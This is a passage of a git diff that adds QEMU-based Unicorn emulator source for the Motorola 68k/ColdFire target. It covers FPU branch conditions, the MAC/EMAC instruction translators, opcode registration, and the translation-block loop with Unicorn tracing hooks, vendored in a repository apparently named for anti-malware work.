tcg_gen_brcond_i32(tcg_ctx, TCG_COND_LT, flag, tcg_const_i32(tcg_ctx, 0), l1); + break; + case 5: /* ole (=-1 or =0) */ + tcg_gen_brcond_i32(tcg_ctx, TCG_COND_LE, flag, tcg_const_i32(tcg_ctx, 0), l1); + break; + case 6: /* ogl (=-1 or =1) */ + tcg_gen_andi_i32(tcg_ctx, flag, flag, 1); + tcg_gen_brcond_i32(tcg_ctx, TCG_COND_NE, flag, tcg_const_i32(tcg_ctx, 0), l1); + break; + case 7: /* or (=2) */ + tcg_gen_brcond_i32(tcg_ctx, TCG_COND_EQ, flag, tcg_const_i32(tcg_ctx, 2), l1); + break; + case 8: /* un (<2) */ + tcg_gen_brcond_i32(tcg_ctx, TCG_COND_LT, flag, tcg_const_i32(tcg_ctx, 2), l1); + break; + case 9: /* ueq (=0 or =2) */ + tcg_gen_andi_i32(tcg_ctx, flag, flag, 1); + tcg_gen_brcond_i32(tcg_ctx, TCG_COND_EQ, flag, tcg_const_i32(tcg_ctx, 0), l1); + break; + case 10: /* ugt (>0) */ + 
tcg_gen_brcond_i32(tcg_ctx, TCG_COND_GT, flag, tcg_const_i32(tcg_ctx, 0), l1); + break; + case 11: /* uge (>=0) */ + tcg_gen_brcond_i32(tcg_ctx, TCG_COND_GE, flag, tcg_const_i32(tcg_ctx, 0), l1); + break; + case 12: /* ult (=-1 or =2) */ + tcg_gen_brcond_i32(tcg_ctx, TCG_COND_GEU, flag, tcg_const_i32(tcg_ctx, 2), l1); + break; + case 13: /* ule (!=1) */ + tcg_gen_brcond_i32(tcg_ctx, TCG_COND_NE, flag, tcg_const_i32(tcg_ctx, 1), l1); + break; + case 14: /* ne (!=0) */ + tcg_gen_brcond_i32(tcg_ctx, TCG_COND_NE, flag, tcg_const_i32(tcg_ctx, 0), l1); + break; + case 15: /* t */ + tcg_gen_br(tcg_ctx, l1); + break; + } + gen_jmp_tb(s, 0, s->pc); + gen_set_label(tcg_ctx, l1); + gen_jmp_tb(s, 1, addr + offset); +} + +DISAS_INSN(frestore) +{ + M68kCPU *cpu = m68k_env_get_cpu(env); + + /* TODO: Implement frestore. */ + cpu_abort(CPU(cpu), "FRESTORE not implemented"); +} + +DISAS_INSN(fsave) +{ + M68kCPU *cpu = m68k_env_get_cpu(env); + + /* TODO: Implement fsave. */ + cpu_abort(CPU(cpu), "FSAVE not implemented"); +} + +static inline TCGv gen_mac_extract_word(DisasContext *s, TCGv val, int upper) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv tmp = tcg_temp_new(tcg_ctx); + if (s->env->macsr & MACSR_FI) { + if (upper) + tcg_gen_andi_i32(tcg_ctx, tmp, val, 0xffff0000); + else + tcg_gen_shli_i32(tcg_ctx, tmp, val, 16); + } else if (s->env->macsr & MACSR_SU) { + if (upper) + tcg_gen_sari_i32(tcg_ctx, tmp, val, 16); + else + tcg_gen_ext16s_i32(tcg_ctx, tmp, val); + } else { + if (upper) + tcg_gen_shri_i32(tcg_ctx, tmp, val, 16); + else + tcg_gen_ext16u_i32(tcg_ctx, tmp, val); + } + return tmp; +} + +static void gen_mac_clear_flags(DisasContext *s) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + tcg_gen_andi_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_MACSR, *(TCGv *)tcg_ctx->QREG_MACSR, + ~(MACSR_V | MACSR_Z | MACSR_N | MACSR_EV)); +} + +DISAS_INSN(mac) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv rx; + TCGv ry; + uint16_t ext; + int acc; + TCGv tmp; + TCGv addr; + TCGv loadval; + int 
dual; + TCGv saved_flags; + + if (!s->done_mac) { + s->mactmp = tcg_temp_new_i64(tcg_ctx); + s->done_mac = 1; + } + + ext = cpu_lduw_code(env, s->pc); + s->pc += 2; + + acc = ((insn >> 7) & 1) | ((ext >> 3) & 2); + dual = ((insn & 0x30) != 0 && (ext & 3) != 0); + if (dual && !m68k_feature(s->env, M68K_FEATURE_CF_EMAC_B)) { + disas_undef(env, s, insn); + return; + } + if (insn & 0x30) { + /* MAC with load. */ + tmp = gen_lea(env, s, insn, OS_LONG); + addr = tcg_temp_new(tcg_ctx); + tcg_gen_and_i32(tcg_ctx, addr, tmp, *(TCGv *)tcg_ctx->QREG_MAC_MASK); + /* Load the value now to ensure correct exception behavior. + Perform writeback after reading the MAC inputs. */ + loadval = gen_load(s, OS_LONG, addr, 0); + + acc ^= 1; + rx = (ext & 0x8000) ? AREG(ext, 12) : DREG(insn, 12); + ry = (ext & 8) ? AREG(ext, 0) : DREG(ext, 0); + } else { + loadval = addr = *(TCGv *)tcg_ctx->NULL_QREG; + rx = (insn & 0x40) ? AREG(insn, 9) : DREG(insn, 9); + ry = (insn & 8) ? AREG(insn, 0) : DREG(insn, 0); + } + + gen_mac_clear_flags(s); +#if 0 + l1 = -1; + /* Disabled because conditional branches clobber temporary vars. */ + if ((s->env->macsr & MACSR_OMC) != 0 && !dual) { + /* Skip the multiply if we know we will ignore it. */ + l1 = gen_new_label(tcg_ctx); + tmp = tcg_temp_new(tcg_ctx); + tcg_gen_andi_i32(tcg_ctx, tmp, *(TCGv *)tcg_ctx->QREG_MACSR, 1 << (acc + 8)); + gen_op_jmp_nz32(tmp, l1); + } +#endif + + if ((ext & 0x0800) == 0) { + /* Word. 
*/ + rx = gen_mac_extract_word(s, rx, (ext & 0x80) != 0); + ry = gen_mac_extract_word(s, ry, (ext & 0x40) != 0); + } + if (s->env->macsr & MACSR_FI) { + gen_helper_macmulf(tcg_ctx, s->mactmp, tcg_ctx->cpu_env, rx, ry); + } else { + if (s->env->macsr & MACSR_SU) + gen_helper_macmuls(tcg_ctx, s->mactmp, tcg_ctx->cpu_env, rx, ry); + else + gen_helper_macmulu(tcg_ctx, s->mactmp, tcg_ctx->cpu_env, rx, ry); + switch ((ext >> 9) & 3) { + case 1: + tcg_gen_shli_i64(tcg_ctx, s->mactmp, s->mactmp, 1); + break; + case 3: + tcg_gen_shri_i64(tcg_ctx, s->mactmp, s->mactmp, 1); + break; + } + } + + if (dual) { + /* Save the overflow flag from the multiply. */ + saved_flags = tcg_temp_new(tcg_ctx); + tcg_gen_mov_i32(tcg_ctx, saved_flags, *(TCGv *)tcg_ctx->QREG_MACSR); + } else { + saved_flags = *(TCGv *)tcg_ctx->NULL_QREG; + } + +#if 0 + /* Disabled because conditional branches clobber temporary vars. */ + if ((s->env->macsr & MACSR_OMC) != 0 && dual) { + /* Skip the accumulate if the value is already saturated. */ + l1 = gen_new_label(tcg_ctx); + tmp = tcg_temp_new(tcg_ctx); + gen_op_and32(tmp, *(TCGv *)tcg_ctx->QREG_MACSR, tcg_const_i32(tcg_ctx, MACSR_PAV0 << acc)); + gen_op_jmp_nz32(tmp, l1); + } +#endif + + if (insn & 0x100) + tcg_gen_sub_i64(tcg_ctx, MACREG(acc), MACREG(acc), s->mactmp); + else + tcg_gen_add_i64(tcg_ctx, MACREG(acc), MACREG(acc), s->mactmp); + + if (s->env->macsr & MACSR_FI) + gen_helper_macsatf(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, acc)); + else if (s->env->macsr & MACSR_SU) + gen_helper_macsats(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, acc)); + else + gen_helper_macsatu(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, acc)); + +#if 0 + /* Disabled because conditional branches clobber temporary vars. */ + if (l1 != -1) + gen_set_label(tcg_ctx, l1); +#endif + + if (dual) { + /* Dual accumulate variant. */ + acc = (ext >> 2) & 3; + /* Restore the overflow flag from the multiplier. 
*/ + tcg_gen_mov_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_MACSR, saved_flags); +#if 0 + /* Disabled because conditional branches clobber temporary vars. */ + if ((s->env->macsr & MACSR_OMC) != 0) { + /* Skip the accumulate if the value is already saturated. */ + l1 = gen_new_label(tcg_ctx); + tmp = tcg_temp_new(tcg_ctx); + gen_op_and32(tmp, *(TCGv *)tcg_ctx->QREG_MACSR, tcg_const_i32(tcg_ctx, MACSR_PAV0 << acc)); + gen_op_jmp_nz32(tmp, l1); + } +#endif + if (ext & 2) + tcg_gen_sub_i64(tcg_ctx, MACREG(acc), MACREG(acc), s->mactmp); + else + tcg_gen_add_i64(tcg_ctx, MACREG(acc), MACREG(acc), s->mactmp); + if (s->env->macsr & MACSR_FI) + gen_helper_macsatf(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, acc)); + else if (s->env->macsr & MACSR_SU) + gen_helper_macsats(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, acc)); + else + gen_helper_macsatu(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, acc)); +#if 0 + /* Disabled because conditional branches clobber temporary vars. */ + if (l1 != -1) + gen_set_label(tcg_ctx, l1); +#endif + } + gen_helper_mac_set_flags(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, acc)); + + if (insn & 0x30) { + TCGv rw; + rw = (insn & 0x40) ? AREG(insn, 9) : DREG(insn, 9); + tcg_gen_mov_i32(tcg_ctx, rw, loadval); + /* FIXME: Should address writeback happen with the masked or + unmasked value? */ + switch ((insn >> 3) & 7) { + case 3: /* Post-increment. */ + tcg_gen_addi_i32(tcg_ctx, AREG(insn, 0), addr, 4); + break; + case 4: /* Pre-decrement. */ + tcg_gen_mov_i32(tcg_ctx, AREG(insn, 0), addr); + } + } +} + +DISAS_INSN(from_mac) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv rx; + TCGv_i64 acc; + int accnum; + + rx = (insn & 8) ? 
AREG(insn, 0) : DREG(insn, 0); + accnum = (insn >> 9) & 3; + acc = MACREG(accnum); + if (s->env->macsr & MACSR_FI) { + gen_helper_get_macf(tcg_ctx, rx, tcg_ctx->cpu_env, acc); + } else if ((s->env->macsr & MACSR_OMC) == 0) { + tcg_gen_trunc_i64_i32(tcg_ctx, rx, acc); + } else if (s->env->macsr & MACSR_SU) { + gen_helper_get_macs(tcg_ctx, rx, acc); + } else { + gen_helper_get_macu(tcg_ctx, rx, acc); + } + if (insn & 0x40) { + tcg_gen_movi_i64(tcg_ctx, acc, 0); + tcg_gen_andi_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_MACSR, *(TCGv *)tcg_ctx->QREG_MACSR, ~(MACSR_PAV0 << accnum)); + } +} + +DISAS_INSN(move_mac) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + /* FIXME: This can be done without a helper. */ + int src; + TCGv dest; + src = insn & 3; + dest = tcg_const_i32(tcg_ctx, (insn >> 9) & 3); + gen_helper_mac_move(tcg_ctx, tcg_ctx->cpu_env, dest, tcg_const_i32(tcg_ctx, src)); + gen_mac_clear_flags(s); + gen_helper_mac_set_flags(tcg_ctx, tcg_ctx->cpu_env, dest); +} + +DISAS_INSN(from_macsr) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv reg; + + reg = (insn & 8) ? AREG(insn, 0) : DREG(insn, 0); + tcg_gen_mov_i32(tcg_ctx, reg, *(TCGv *)tcg_ctx->QREG_MACSR); +} + +DISAS_INSN(from_mask) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv reg; + reg = (insn & 8) ? AREG(insn, 0) : DREG(insn, 0); + tcg_gen_mov_i32(tcg_ctx, reg, *(TCGv *)tcg_ctx->QREG_MAC_MASK); +} + +DISAS_INSN(from_mext) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv reg; + TCGv acc; + reg = (insn & 8) ? AREG(insn, 0) : DREG(insn, 0); + acc = tcg_const_i32(tcg_ctx, (insn & 0x400) ? 
2 : 0); + if (s->env->macsr & MACSR_FI) + gen_helper_get_mac_extf(tcg_ctx, reg, tcg_ctx->cpu_env, acc); + else + gen_helper_get_mac_exti(tcg_ctx, reg, tcg_ctx->cpu_env, acc); +} + +DISAS_INSN(macsr_to_ccr) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + tcg_gen_movi_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_CC_X, 0); + tcg_gen_andi_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_CC_DEST, *(TCGv *)tcg_ctx->QREG_MACSR, 0xf); + s->cc_op = CC_OP_FLAGS; +} + +DISAS_INSN(to_mac) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 acc; + TCGv val; + int accnum; + accnum = (insn >> 9) & 3; + acc = MACREG(accnum); + SRC_EA(env, val, OS_LONG, 0, NULL); + if (s->env->macsr & MACSR_FI) { + tcg_gen_ext_i32_i64(tcg_ctx, acc, val); + tcg_gen_shli_i64(tcg_ctx, acc, acc, 8); + } else if (s->env->macsr & MACSR_SU) { + tcg_gen_ext_i32_i64(tcg_ctx, acc, val); + } else { + tcg_gen_extu_i32_i64(tcg_ctx, acc, val); + } + tcg_gen_andi_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_MACSR, *(TCGv *)tcg_ctx->QREG_MACSR, ~(MACSR_PAV0 << accnum)); + gen_mac_clear_flags(s); + gen_helper_mac_set_flags(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, accnum)); +} + +DISAS_INSN(to_macsr) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv val; + SRC_EA(env, val, OS_LONG, 0, NULL); + gen_helper_set_macsr(tcg_ctx, tcg_ctx->cpu_env, val); + gen_lookup_tb(s); +} + +DISAS_INSN(to_mask) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv val; + SRC_EA(env, val, OS_LONG, 0, NULL); + tcg_gen_ori_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_MAC_MASK, val, 0xffff0000); +} + +DISAS_INSN(to_mext) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv val; + TCGv acc; + SRC_EA(env, val, OS_LONG, 0, NULL); + acc = tcg_const_i32(tcg_ctx, (insn & 0x400) ? 
2 : 0); + if (s->env->macsr & MACSR_FI) + gen_helper_set_mac_extf(tcg_ctx, tcg_ctx->cpu_env, val, acc); + else if (s->env->macsr & MACSR_SU) + gen_helper_set_mac_exts(tcg_ctx, tcg_ctx->cpu_env, val, acc); + else + gen_helper_set_mac_extu(tcg_ctx, tcg_ctx->cpu_env, val, acc); +} + +static void +register_opcode(TCGContext *tcg_ctx, disas_proc proc, uint16_t opcode, uint16_t mask) +{ + int i; + int from; + int to; + + /* Sanity check. All set bits must be included in the mask. */ + if (opcode & ~mask) { + fprintf(stderr, + "qemu internal error: bogus opcode definition %04x/%04x\n", + opcode, mask); + abort(); + } + /* This could probably be cleverer. For now just optimize the case where + the top bits are known. */ + /* Find the first zero bit in the mask. */ + i = 0x8000; + while ((i & mask) != 0) + i >>= 1; + /* Iterate over all combinations of this and lower bits. */ + if (i == 0) + i = 1; + else + i <<= 1; + from = opcode & ~(i - 1); + to = from + i; + for (i = from; i < to; i++) { + if ((i & mask) == opcode) { + tcg_ctx->opcode_table[i] = proc; + } + } +} + +/* Register m68k opcode handlers. Order is important. + Later insn override earlier ones. 
 */
/* Populate the per-context opcode dispatch table for the CPU described by
   ENV.  Each INSN(name, opcode, mask, feature) line registers disas_<name>
   for pattern opcode/mask, but only when ENV advertises the given
   M68K_FEATURE_*.  Registration order matters: later entries overwrite
   earlier, more general ones (e.g. the catch-all undef entries). */
void register_m68k_insns (CPUM68KState *env)
{
    TCGContext *tcg_ctx = env->uc->tcg_ctx;
#define INSN(name, opcode, mask, feature) do { \
    if (m68k_feature(env, M68K_FEATURE_##feature)) \
        register_opcode(tcg_ctx, disas_##name, 0x##opcode, 0x##mask); \
    } while(0)
    /* mask 0000 matches every insn: default all slots to the undef handler. */
    INSN(undef,     0000, 0000, CF_ISA_A);
    INSN(arith_im,  0080, fff8, CF_ISA_A);
    INSN(bitrev,    00c0, fff8, CF_ISA_APLUSC);
    INSN(bitop_reg, 0100, f1c0, CF_ISA_A);
    INSN(bitop_reg, 0140, f1c0, CF_ISA_A);
    INSN(bitop_reg, 0180, f1c0, CF_ISA_A);
    INSN(bitop_reg, 01c0, f1c0, CF_ISA_A);
    INSN(arith_im,  0280, fff8, CF_ISA_A);
    INSN(byterev,   02c0, fff8, CF_ISA_APLUSC);
    INSN(arith_im,  0480, fff8, CF_ISA_A);
    INSN(ff1,       04c0, fff8, CF_ISA_APLUSC);
    INSN(arith_im,  0680, fff8, CF_ISA_A);
    INSN(bitop_im,  0800, ffc0, CF_ISA_A);
    INSN(bitop_im,  0840, ffc0, CF_ISA_A);
    INSN(bitop_im,  0880, ffc0, CF_ISA_A);
    INSN(bitop_im,  08c0, ffc0, CF_ISA_A);
    INSN(arith_im,  0a80, fff8, CF_ISA_A);
    INSN(arith_im,  0c00, ff38, CF_ISA_A);
    INSN(move,      1000, f000, CF_ISA_A);
    INSN(move,      2000, f000, CF_ISA_A);
    INSN(move,      3000, f000, CF_ISA_A);
    INSN(strldsr,   40e7, ffff, CF_ISA_APLUSC);
    INSN(negx,      4080, fff8, CF_ISA_A);
    INSN(move_from_sr, 40c0, fff8, CF_ISA_A);
    INSN(lea,       41c0, f1c0, CF_ISA_A);
    INSN(clr,       4200, ff00, CF_ISA_A);
    INSN(undef,     42c0, ffc0, CF_ISA_A);
    INSN(move_from_ccr, 42c0, fff8, CF_ISA_A);
    INSN(neg,       4480, fff8, CF_ISA_A);
    INSN(move_to_ccr, 44c0, ffc0, CF_ISA_A);
    INSN(not,       4680, fff8, CF_ISA_A);
    INSN(move_to_sr, 46c0, ffc0, CF_ISA_A);
    INSN(pea,       4840, ffc0, CF_ISA_A);
    INSN(swap,      4840, fff8, CF_ISA_A);
    INSN(movem,     48c0, fbc0, CF_ISA_A);
    INSN(ext,       4880, fff8, CF_ISA_A);
    INSN(ext,       48c0, fff8, CF_ISA_A);
    INSN(ext,       49c0, fff8, CF_ISA_A);
    INSN(tst,       4a00, ff00, CF_ISA_A);
    INSN(tas,       4ac0, ffc0, CF_ISA_B);
    INSN(halt,      4ac8, ffff, CF_ISA_A);
    INSN(pulse,     4acc, ffff, CF_ISA_A);
    INSN(illegal,   4afc, ffff, CF_ISA_A);
    INSN(mull,      4c00, ffc0, CF_ISA_A);
    INSN(divl,      4c40, ffc0, CF_ISA_A);
    INSN(sats,      4c80, fff8, CF_ISA_B);
    INSN(trap,      4e40, fff0, CF_ISA_A);
    INSN(link,      4e50, fff8, CF_ISA_A);
    INSN(unlk,      4e58, fff8, CF_ISA_A);
    INSN(move_to_usp, 4e60, fff8, USP);
    INSN(move_from_usp, 4e68, fff8, USP);
    INSN(nop,       4e71, ffff, CF_ISA_A);
    INSN(stop,      4e72, ffff, CF_ISA_A);
    INSN(rte,       4e73, ffff, CF_ISA_A);
    INSN(rts,       4e75, ffff, CF_ISA_A);
    INSN(movec,     4e7b, ffff, CF_ISA_A);
    INSN(jump,      4e80, ffc0, CF_ISA_A);
    INSN(jump,      4ec0, ffc0, CF_ISA_A);
    INSN(addsubq,   5180, f1c0, CF_ISA_A);
    INSN(scc,       50c0, f0f8, CF_ISA_A);
    INSN(addsubq,   5080, f1c0, CF_ISA_A);
    INSN(tpf,       51f8, fff8, CF_ISA_A);

    /* Branch instructions. */
    INSN(branch,    6000, f000, CF_ISA_A);
    /* Disable long branch instructions, then add back the ones we want. */
    INSN(undef,     60ff, f0ff, CF_ISA_A); /* All long branches. */
    INSN(branch,    60ff, f0ff, CF_ISA_B);
    INSN(undef,     60ff, ffff, CF_ISA_B); /* bra.l */
    INSN(branch,    60ff, ffff, BRAL);

    INSN(moveq,     7000, f100, CF_ISA_A);
    INSN(mvzs,      7100, f100, CF_ISA_B);
    INSN(or,        8000, f000, CF_ISA_A);
    INSN(divw,      80c0, f0c0, CF_ISA_A);
    INSN(addsub,    9000, f000, CF_ISA_A);
    INSN(subx,      9180, f1f8, CF_ISA_A);
    INSN(suba,      91c0, f1c0, CF_ISA_A);

    /* The a-line range: MAC/EMAC insns when the EMAC unit exists,
       undef_mac otherwise. */
    INSN(undef_mac, a000, f000, CF_ISA_A);
    INSN(mac,       a000, f100, CF_EMAC);
    INSN(from_mac,  a180, f9b0, CF_EMAC);
    INSN(move_mac,  a110, f9fc, CF_EMAC);
    INSN(from_macsr,a980, f9f0, CF_EMAC);
    INSN(from_mask, ad80, fff0, CF_EMAC);
    INSN(from_mext, ab80, fbf0, CF_EMAC);
    INSN(macsr_to_ccr, a9c0, ffff, CF_EMAC);
    INSN(to_mac,    a100, f9c0, CF_EMAC);
    INSN(to_macsr,  a900, ffc0, CF_EMAC);
    INSN(to_mext,   ab00, fbc0, CF_EMAC);
    INSN(to_mask,   ad00, ffc0, CF_EMAC);

    INSN(mov3q,     a140, f1c0, CF_ISA_B);
    INSN(cmp,       b000, f1c0, CF_ISA_B); /* cmp.b */
    INSN(cmp,       b040, f1c0, CF_ISA_B); /* cmp.w */
    INSN(cmpa,      b0c0, f1c0, CF_ISA_B); /* cmpa.w */
    INSN(cmp,       b080, f1c0, CF_ISA_A);
    INSN(cmpa,      b1c0, f1c0, CF_ISA_A);
    INSN(eor,       b180, f1c0, CF_ISA_A);
    INSN(and,       c000, f000, CF_ISA_A);
    INSN(mulw,      c0c0, f0c0, CF_ISA_A);
    INSN(addsub,    d000, f000, CF_ISA_A);
    INSN(addx,      d180, f1f8, CF_ISA_A);
    INSN(adda,      d1c0, f1c0, CF_ISA_A);
    INSN(shift_im,  e080, f0f0, CF_ISA_A);
    INSN(shift_reg, e0a0, f0f0, CF_ISA_A);
    INSN(undef_fpu, f000, f000, CF_ISA_A);
    INSN(fpu,       f200, ffc0, CF_FPU);
    INSN(fbcc,      f280, ffc0, CF_FPU);
    INSN(frestore,  f340, ffc0, CF_FPU);
    INSN(fsave,     f340, ffc0, CF_FPU);
    INSN(intouch,   f340, ffc0, CF_ISA_A);
    INSN(cpushl,    f428, ff38, CF_ISA_A);
    INSN(wddata,    fb00, ff00, CF_ISA_A);
    INSN(wdebug,    fbc0, ffc0, CF_ISA_A);
#undef INSN
}

/* ??? Some of this implementation is not exception safe. We should always
   write back the result to memory before setting the condition codes. */
/* Translate one m68k instruction at s->pc: fetch the 16-bit opcode word,
   advance s->pc, and dispatch through tcg_ctx->opcode_table.  Also emits
   Unicorn-specific hooks (stop-at-end-address, per-instruction UC_HOOK_CODE
   tracing) before the instruction itself. */
static void disas_m68k_insn(CPUM68KState * env, DisasContext *s)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    uint16_t insn;

    if (unlikely(qemu_loglevel_mask(CPU_LOG_TB_OP | CPU_LOG_TB_OP_OPT))) {
        tcg_gen_debug_insn_start(tcg_ctx, s->pc);
    }

    // Unicorn: end address tells us to stop emulation
    if (s->pc == s->uc->addr_end) {
        gen_exception(s, s->pc, EXCP_HLT);
        return;
    }

    // Unicorn: trace this instruction on request
    if (HOOK_EXISTS_BOUNDED(env->uc, UC_HOOK_CODE, s->pc)) {
        /* 2 == size of an m68k opcode word, reported to the hook. */
        gen_uc_tracecode(tcg_ctx, 2, UC_HOOK_CODE_IDX, env->uc, s->pc);
        // the callback might want to stop emulation immediately
        check_exit_request(tcg_ctx);
    }

    insn = cpu_lduw_code(env, s->pc);
    s->pc += 2;

    /* Every slot is populated (see register_m68k_insns), so this indirect
       call is always valid; unknown patterns hit a disas_undef* handler. */
    ((disas_proc)tcg_ctx->opcode_table[insn])(env, s, insn);
}

/* generate intermediate code for basic block 'tb'.
 */
/* Core translation loop: turn the guest code starting at tb->pc into TCG ops.
   When search_pc is true, additionally fill the gen_opc_pc /
   gen_opc_instr_start side tables used to map host PCs back to guest PCs.
   Unicorn additions: stop immediately at uc->addr_end, emit the
   UC_HOOK_BLOCK trace call at block entry, and record in uc->block_full
   whether translation stopped because the opcode buffer filled up. */
static inline void
gen_intermediate_code_internal(M68kCPU *cpu, TranslationBlock *tb,
                               bool search_pc)
{
    CPUState *cs = CPU(cpu);
    CPUM68KState *env = &cpu->env;
    DisasContext dc1, *dc = &dc1;
    uint16_t *gen_opc_end;
    CPUBreakpoint *bp;
    int j, lj;
    target_ulong pc_start;
    int pc_offset;
    int num_insns;
    int max_insns;
    TCGContext *tcg_ctx = env->uc->tcg_ctx;
    bool block_full = false;

    /* generate intermediate code */
    pc_start = tb->pc;

    dc->tb = tb;
    dc->uc = env->uc;

    gen_opc_end = tcg_ctx->gen_opc_buf + OPC_MAX_SIZE;

    dc->env = env;
    dc->is_jmp = DISAS_NEXT;
    dc->pc = pc_start;
    dc->cc_op = CC_OP_DYNAMIC;  /* condition codes not yet known statically */
    dc->singlestep_enabled = cs->singlestep_enabled;
    dc->fpcr = env->fpcr;
    dc->user = (env->sr & SR_S) == 0;
    dc->is_mem = 0;
    dc->done_mac = 0;
    lj = -1;
    num_insns = 0;
    max_insns = tb->cflags & CF_COUNT_MASK;
    if (max_insns == 0)
        max_insns = CF_COUNT_MASK;

    // Unicorn: early check to see if the address of this block is the until address
    if (tb->pc == env->uc->addr_end) {
        gen_tb_start(tcg_ctx);
        gen_exception(dc, dc->pc, EXCP_HLT);
        goto done_generating;
    }

    // Unicorn: trace this block on request
    // Only hook this block if it is not broken from previous translation due to
    // full translation cache
    if (!env->uc->block_full && HOOK_EXISTS_BOUNDED(env->uc, UC_HOOK_BLOCK, pc_start)) {
        // save block address to see if we need to patch block size later
        env->uc->block_addr = pc_start;
        env->uc->size_arg = tcg_ctx->gen_opparam_buf - tcg_ctx->gen_opparam_ptr + 1;
        /* 0xf8f8f8f8 is a placeholder size, patched once the real block
           size is known. */
        gen_uc_tracecode(tcg_ctx, 0xf8f8f8f8, UC_HOOK_BLOCK_IDX, env->uc, pc_start);
    } else {
        env->uc->size_arg = -1;
    }

    gen_tb_start(tcg_ctx);
    do {
        pc_offset = dc->pc - pc_start;
        if (unlikely(!QTAILQ_EMPTY(&cs->breakpoints))) {
            QTAILQ_FOREACH(bp, &cs->breakpoints, entry) {
                if (bp->pc == dc->pc) {
                    gen_exception(dc, dc->pc, EXCP_DEBUG);
                    dc->is_jmp = DISAS_JUMP;
                    break;
                }
            }
            if (dc->is_jmp)
                break;
        }
        if (search_pc) {
            /* Record the guest PC for each generated op index so that
               restore_state_to_opc() can recover it later. */
            j = tcg_ctx->gen_opc_ptr - tcg_ctx->gen_opc_buf;
            if (lj < j) {
                lj++;
                while (lj < j)
                    tcg_ctx->gen_opc_instr_start[lj++] = 0;
            }
            tcg_ctx->gen_opc_pc[lj] = dc->pc;
            tcg_ctx->gen_opc_instr_start[lj] = 1;
            //tcg_ctx.gen_opc_icount[lj] = num_insns;
        }
        //if (num_insns + 1 == max_insns && (tb->cflags & CF_LAST_IO))
        //    gen_io_start();
        dc->insn_pc = dc->pc;
        disas_m68k_insn(env, dc);
        num_insns++;
    } while (!dc->is_jmp && tcg_ctx->gen_opc_ptr < gen_opc_end &&
             !cs->singlestep_enabled &&
             (pc_offset) < (TARGET_PAGE_SIZE - 32) &&
             num_insns < max_insns);

    /* if too long translation, save this info */
    if (tcg_ctx->gen_opc_ptr >= gen_opc_end || num_insns >= max_insns)
        block_full = true;

    //if (tb->cflags & CF_LAST_IO)
    //    gen_io_end();
    if (unlikely(cs->singlestep_enabled)) {
        /* Make sure the pc is updated, and raise a debug exception. */
        if (!dc->is_jmp) {
            gen_flush_cc_op(dc);
            tcg_gen_movi_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_PC, dc->pc);
        }
        gen_helper_raise_exception(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, EXCP_DEBUG));
    } else {
        switch(dc->is_jmp) {
        case DISAS_NEXT:
            /* Fell off the end of the block: chain to the next TB. */
            gen_flush_cc_op(dc);
            gen_jmp_tb(dc, 0, dc->pc);
            break;
        default:
        case DISAS_JUMP:
        case DISAS_UPDATE:
            gen_flush_cc_op(dc);
            /* indicate that the hash table must be used to find the next TB */
            tcg_gen_exit_tb(tcg_ctx, 0);
            break;
        case DISAS_TB_JUMP:
            /* nothing more to generate */
            break;
        }
    }

done_generating:
    gen_tb_end(tcg_ctx, tb, num_insns);
    *tcg_ctx->gen_opc_ptr = INDEX_op_end;

    if (search_pc) {
        /* Zero-fill the instr_start table up to the final op index. */
        j = tcg_ctx->gen_opc_ptr - tcg_ctx->gen_opc_buf;
        lj++;
        while (lj <= j)
            tcg_ctx->gen_opc_instr_start[lj++] = 0;
    } else {
        tb->size = dc->pc - pc_start;
        //tb->icount = num_insns;
    }

    //optimize_flags();
    //expand_target_qops();

    env->uc->block_full = block_full;
}

/* Public entry point: translate TB without PC-search side tables. */
void gen_intermediate_code(CPUM68KState *env, TranslationBlock *tb)
{
    gen_intermediate_code_internal(m68k_env_get_cpu(env), tb, false);
}

/* Entry point used when a guest-PC mapping is needed (search_pc = true). */
void gen_intermediate_code_pc(CPUM68KState *env, TranslationBlock *tb)
{
    gen_intermediate_code_internal(m68k_env_get_cpu(env), tb, true);
}

/* Restore env->pc from the side table recorded during a search_pc
   translation (see gen_intermediate_code_internal). */
void restore_state_to_opc(CPUM68KState *env, TranslationBlock *tb, int pc_pos)
{
    TCGContext *tcg_ctx = env->uc->tcg_ctx;
    env->pc = tcg_ctx->gen_opc_pc[pc_pos];
}
diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/unicorn.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/unicorn.c
new file mode 100644
index 0000000..f63d742
--- /dev/null
+++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/unicorn.c
@@ -0,0 +1,122 @@
/* Unicorn Emulator Engine */
